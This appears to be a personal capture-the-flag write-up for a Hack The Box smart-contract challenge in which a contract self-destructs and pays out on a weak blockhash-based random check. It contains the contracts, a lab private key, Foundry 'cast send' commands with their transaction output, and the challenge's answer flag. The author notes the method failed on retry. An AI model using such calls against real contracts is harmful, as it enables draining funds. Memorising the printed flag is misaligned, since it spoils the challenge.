We have two files:
setup.sol
pragma solidity 0.8.23;
import {RussianRoulette} from "./RussianRoulette.sol";
contract Setup {
RussianRoulette public immutable TARGET;
constructor() payable {
TARGET = new RussianRoulette{value: 10 ether}();
}
function isSolved() public view returns (bool) {
return address(TARGET).balance == 0;
}
}
RussianRoulette.sol
pragma solidity 0.8.23;
contract RussianRoulette {
constructor() payable {
// i need more bullets
}
function pullTrigger() public returns (string memory) {
if (uint256(blockhash(block.number - 1)) % 10 == 7) {
selfdestruct(payable(msg.sender)); // 💀
} else {
return "im SAFU ... for now";
}
}
}
This is for working with the challenge:
nc 94.237.50.221 46539
This is for getting the flag:
nc 94.237.50.221 52428
Private key : 0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8
Address : 0xdda87a53d91521d3dF09Ef59A303dCd0849830Ea
Target contract : 0xe61aD3d13a4396003e971BC4BF94F24A3Bb21304
Setup contract : 0x448dC8764488597cd729D0BceCa3a19545f8673F
This guide suggests using remix, so I did:
This did not work and I could not connect to the RPC URL in the named tools.
I found a better writeup:
[user@arch ~]$ cast send --rpc-url=http://94.237.50.221:46539 --private-key=0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8 0xe61aD3d13a4396003e971BC4BF94F24A3Bb21304 "pullTrigger()" 10
blockHash 0xbd48d4182b3c18ce7b694e3b34f3ac30146894954567722d3a6f1e88279cc062
blockNumber 2
contractAddress
cumulativeGasUsed 26358
effectiveGasPrice 3000000000
from 0xdda87a53d91521d3dF09Ef59A303dCd0849830Ea
gasUsed 26358
logs []
logsBloom 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
root
status 1
transactionHash 0xb0a0602328b09bbb0cc4d98425648a7405d6385d10ac0556f790aaa3d741b66a
transactionIndex 0
type 2
to 0xe61aD3d13a4396003e971BC4BF94F24A3Bb21304
depositNonce null
[user@arch ~]$ cast send --rpc-url=http://94.237.50.221:46539 --private-key=0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8 0x448dC8764488597cd729D0BceCa3a19545f8673F "isSolved()"
blockHash 0x4d9b9d77568b296f76b2057a11da3bf858f44b71a158a3194fba6e9e2d6e88a5
blockNumber 3
contractAddress
cumulativeGasUsed 23829
effectiveGasPrice 3000000000
from 0xdda87a53d91521d3dF09Ef59A303dCd0849830Ea
gasUsed 23829
logs []
logsBloom 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
root
status 1
transactionHash 0x2439e5daacaf655fe5f4368fbaf4b8aef25dd6aa1b3b2c61d13c37d4833f9fe3
transactionIndex 0
type 2
to 0x448dC8764488597cd729D0BceCa3a19545f8673F
depositNonce null
nc 94.237.50.221 52428
1 - Connection information
2 - Restart Instance
3 - Get flag
action? 3
HTB{99%_0f_g4mbl3rs_quit_b4_bigwin}
The only two commands that I essentially required are these:
cast send --rpc-url=http://94.237.50.221:46539 --private-key=<private key> <target key> "pullTrigger()"
cast send --rpc-url=http://94.237.50.221:46539 --private-key=<private key> <setup key> "isSolved()"
After retrying however, this did not work anymore and I am not sure why.
